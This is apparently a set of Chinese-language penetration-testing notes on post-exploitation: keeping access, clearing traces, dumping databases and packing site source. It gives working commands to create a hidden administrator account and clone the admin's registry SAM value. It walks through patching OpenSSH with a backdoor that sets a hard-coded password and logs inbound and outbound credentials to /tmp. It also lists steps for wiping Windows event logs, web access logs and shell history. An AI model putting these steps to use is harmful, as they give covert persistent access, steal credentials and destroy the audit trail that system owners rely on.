后渗透
留后门,方便下次入侵
清理痕迹
数据库脱库测试
源码打包
Windows后门安装
账号后门(用户后门)
LPK后门(程序后门)
木马后门(程序后门)
账号后门
net user
net user a$ a /add
net localgrop administrators a /add
support_338945ao 克隆账号 1、先设置密码
打开注册表 regedit
HKET_LOCAL_MACHINE-ASM-SAM-Domains-User-Name
找到管理员,打开管理员的F值,全复制
找到要克隆的账号,打开F值,全选粘贴替换掉
为什么要克隆账号
1、首次,在一个用户登录计算机时,会在c:\Documents and settings里面有记录
即创建一个账号远程登录后,会创建一个家目录,
但克隆后的账号登录后并不会有这种情况。
LPK后门
生成LPK.dll
木马后门
Linux安装后门
tar zxvf openssh-5.9p1.tar.gz
tar zxvf Ox06-0penssh-5.9p1.patch.tar.gz
cd openssh-5.9p1.patch/
cp sshbd5.9p1.diff ../openssh-5.9p1
cd ../openssh-5.9p1
patch < sshbd5.9p1.diff //patch 后门
vi includes.h //修改后门密码,记录文件位置
/*
+#define ILOG “/tmp/ilog” //记录登录到本机的用户名和密码
+#define OLOG “/tmp/olog” //记录本机登录到远程的用户名和密码
+#define SECRETPW “123456321” //后门密码
*/
先安装所需环境
yum install –y openssl openssl-devel pam-devel
./configure –prefix=/usr –sysconfdir=/etc/ssh –with-pam –with-kerberos5
注意,要是出现:
configure:error:*** zlib.h missing –please install first or check config.log
需要安装zlib
yum install –y zlib zlib-devel //http://sourceforge.net/projects/libpng/files/zlib/1.2.3/zlib-1.2.3.tar.gz/download
需要make clean
make && make install //编译和安装
serrice sshd restart //重启sshed
然后登录
Windows系统日志清除
扫描/访问日志-都是和网站进行交互-记录在访问日志
上传后门-看文件日期
我的电脑-管理-事件查看器-安全性-审核成功
网站日志-网站-属性-日志
文件目录
Linux系统日志清除
历史命令
访问日志:
ls /var/log/httpd/access_log
ls /etc/httpd/logs/access_log
源码打包
asp+access
asp+sqlserver
大马中的服务器打包
脱库
菜刀、大马、脱裤马、、、